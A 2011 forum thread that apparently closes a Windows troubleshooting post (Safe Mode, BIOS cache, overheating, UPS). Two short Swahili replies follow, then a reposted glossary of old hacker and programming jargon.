    Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from Registry Cleaner, Optimize Windows with our System Utilities | Macecraft Software


    Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.


    Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.


    Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.


    Remember to restore all the BIOS settings back to their former settings following installation.


    9 Overheating


    Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.


    One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from ComputerNerd.com ~Welcome ! ! Best Price--Xenion iSD01 6 watt docking speaker system for iPod ! or coolit.com


    CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.


    10 Power supply problems


    With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.


    If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.


    It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.
     
  3. Sooth

    Sooth JF-Expert Member

    #3
    Jun 18, 2011
    Joined: Apr 27, 2009
    Messages: 1,894
    Likes Received: 662
    Trophy Points: 280
    Nimekupata ndugu, it seems detailed enough. I hope 'vijana' watakuwa na ari ya kujifunza na kujaribu-kwa lengo zuri tu. Nafikiria kuitumia sometime later.
     
  4. MziziMkavu

    MziziMkavu JF-Expert Member

    #4
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    inatakiwa ujuwe kila kitu kinachohusu mambo ya Computer ndipo utaweza kujilinda Virus,Hacker,Spam, Spyware, na Worm ukiweza kujuwa ni jinsi gani maaduwi wanavyoweza kutengeneza silaha na kushambulia ndipo waweza na wewe kutafuta njia ya kujilinda mkuu nakutakia mafanikio mema
     
  5. MziziMkavu

    MziziMkavu JF-Expert Member

    #5
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    A Short 'HACKERSPEAK' Glossary
    -
    A reference to a few of the terms used by many computer hackers.
    -
    (Researched and compiled by members of the Hollywood User Group)
    -


    arg - (argh) noun. An argument, in the mathematical sense.


    automagically - adverb. Automatically, but in a way which, for some
    reason (for example, because it's too complicated or too trivial) the
    speaker doesn't feel like explaining.


    bells and whistles - n. Unnecessary (but often convenient, useful,
    good-looking, or amusing) features of a program or other object. Added
    to a bare-bones, working program.


    bit - n. 1) A unit of information obtained by asking a question (e.g.
    - 'I need a few bits about Punter protocol') 2) A mental flag;
    reminder that something should be done eventually.


    buffer - verb. The act of saving or setting aside something to be done
    later. (e.g. - 'I'm going to buffer that and go eat now').


    bug - n. A problem or mistake; unwanted property or side effect.
    Usually of a program, but can refer to a person. Can be very simple or
    very complicated. Antonym: FEATURE.


    bum - v. To improve something by rearranging or removing its parts.
    Most often done to a program to increase speed or save memory space,
    usually at the expense of clarity.


    buzz - v. Of a program, to run without visible progress or certainty
    of finishing. Resembles CATATONIA except that a buzzing loop may
    eventually end.


    canonical - (ki NAHN i kil) adjective. Standard, usual or ordinary way
    of doing something.


    catatonia - n. A condition in which something is supposed to happen,
    but nothing does. (e.g. - Nothing you type will appear on the screen.
    It's catatonic. Often means a CRASH has occured.)


    crash - 1) n. Sudden, drastic failure. Usually refers to a complete
    computer system or program. 2) v. To fail suddenly or cause to fail.
    3) v. Of people, to go to sleep.


    creeping featurism - n. Tendency for anything complicated to become
    even more so because people keep saying, 'Hey, it would be terrific if
    the program had this feature, and could do this, and...' The result is
    a patchwork program, confusing to read, with a lot of 'neat' features.


    crock - n. Said of a program that works, but in an extremely awkward
    or cumbersome manner.


    crunch - v. To process, usually in a time-consuming, complex way.
    Example: Performing large, repetitive numerical computations is called
    'number crunching'. 2) v. To reduce the size of a file (often in a
    complicated way) to save space.


    dec'ed out - (decked out) adj. Stoned, drunk (and possibly trying to
    program, regardless). Uncomplimentary. Derives from the 65-- series
    ML opcode DECrement, i.e.: decrease a value.


    elegant - adj. Said of a piece of code that does the RIGHT THING in a
    way beautiful to look at.


    feature - n. An extra property or behaviour added to a program that
    already does the job. May or may not be useful, necessary or
    convenient.


    fencepost error - n. A mathematical 'off-by-one' error. Most often
    found in programs that must count loops (it will count one time too
    many, or too few). Term comes from the problem: 'If you build a fence
    100 feet long with posts 10 feet apart, how many posts fo you need?'
    Example: Suppose you want to process an array of items x thru y. How
    many are there? The correct answer is x-y+1 (not x-y, which would be
    off by one).


    flavor - n. variety, kind, type. (flavorful - adj. Aesthetically
    pleasing).


    flush - v. To scratch, delete or destroy something. Often something
    superfluous or useless.


    fudge - v. Perform in an incomplete, but marginally acceptable way.
    'I fudged it, so it works.'


    GC - (jee see) 1) v. To clean up, throw away useless things. 2) To
    forget. GC is an abreviation of the term 'Garbage Collection', the
    common method of freeing up memory space.


    glitch - n. Sudden interruption in electrical service, common sense,
    or program function. Usually happens only when you pray that it
    doesn't.


    grovel - v. To work interminably, examine minutely or in extreme
    detail.


    gun - v. To forcibly terminate a program. 'It was a boring display,
    so I gunned it.'


    hack - n. An appropriate application of ingenuity. It could be a
    quick-and-dirty bug fix, or a time-consuming and elegant work of art.
    A clever technique.


    hack value - n. The motivation for expending effort and time toward a
    seemingly pointless goal, the point being the resulting hack.


    hack attack - n. Period of greatly increased hacking activity. Not to
    be confused with a Mac-Attack.


    hacker - n. 1) One who greatly enjoys learning the details of a
    computer system and how to stretch their capabilities (as opposed to
    REAL USERS who learn only the minimum amount necessary). 2) One who
    programs enthusiastically, rather than just theorizing about it. 3)
    One capable of appreciating HACK VALUE. 4) An expert of any kind 5) A
    malicious or inquisitive meddler (in the case of a 'system hacker' or a
    'password hacker').


    inc it up - (also 'incing') v. Specifically related to studying,
    reading, or learning ML. Derives from the 65-- series ML instruction
    INCrement a value; i.e. increase it.


    jock - n. Programmer characterized by the large, cumbersome,
    brute-force programs he/she writes. The programs may work, but slowly,
    inelegantly, or in an ugly way.


    kludge - (kloog) 1) n. Clever programming trick, most often to fix a
    bug. Efficient, but maybe unclear. 2) v. To insert a kludge into a
    program (to fix a bug or add a feature).


    magic - adj. Something as yet unexplained or too complex to imagine.


    M&M's - n. Mental and Midget; i.e. Mental Midget. Uncomplimentary
    term applied most often to 'system hackers' who intrude for disruptive
    or destructive purposes (like to crash BBS's).


    misfeature - n. A FEATURE that eventually turns out to be more trouble
    than it was worth, possibly because it is inadequate for a new user or
    situation that has evolved. Misfeatures are different from bugs or
    side-effects in that they are often more basic to the program design
    and, at one time, were carefully planned.


    moby - 1) adj. Immense, complex, or impressive. 2) n. Total size of
    a computers address space.


    mode - n. A general state. Examples: DAY MODE - state a person is in
    when s/he is working days and sleeping nights.


    mumble - interjection. Said when the correct response is too
    complicated to put into words or has not been thought out. Can
    indicate a reluctance to enter a long discussion.


    mumblage - n. The subject matter of one's mumbling. Replaces 'all
    that stuff'.


    nop around (or nopping) - v. Hanging out; not doing much; not
    programming. Derives from the 65-- series ML instruction code 'NOP'
    (No OPeration).


    obie (or o.b.) - n. Derives from a pun with the word 'OverByte'.
    Usually relates to a ML routine that doesn't work because of some
    small mistake, possibly an incorrect addressing mode or even a typing
    error. Most often one or two bytes wrong.


    patch - 1) n. Piece of code intended as a quick-and-dirty remedy to a
    BUG or MISFEATURE. 2) v. To fix something temporarily; insert a patch
    into a piece of code; make the main program machine-specific.


    punt - v. To give up; decide not to do.


    rave - v. 1) To persist in discussing something. 2) To speak
    authoritatively about that which one knows very little. 3) To
    proselytize.


    real user - n. A commercial user; a non-hacker who uses computer
    applications only.


    Real World, The - n. 1) Places where programs have only business
    applications. 2) Institutions such as IBM. 3) The location of
    non-programmers and non-programming activity. The first two
    definitions are uncomplimentary; the third is not.


    Right Thing, The - n. that which is obviously the appropriate thing to
    use, do, say, etc.


    rude - (rood or roo-day) adj. Programs badly written or functionally
    poor.


    sacred - adj. Reserved for the exclusive use of something. Usually
    refers to memory location or register that shouldn't be used because
    what is stored there must not change.


    slurp - v. To read a large data file into memory before using or
    processing data.


    smart - adj. Said of a program (or something) that does THE RIGHT
    THING.


    SMOP - n. An acronym for a 'Small Matter Of Programming'. A piece of
    code that would not at all be hard to write, but would take a very long
    time because of its size. Not worth the trouble.


    snail mail - n. Mail sent via Post Office, rather than electronically.


    software rot - n. Hypothetical disease that causes working programs to
    stop working when unused for a period of time.


    tense - adj. Of programs, very clever and efficient. A tense
    programmer produces tense code.


    vanilla - adj. Standard, usual, or ordinary FLAVOR.


    zero - v. 1) To set a bit or variable to zero. 2) To erase, or
    discard all data from.


    zorch - v. 1) To move quickly. 2) Influences. 3) Energy or ability.
     
Loading...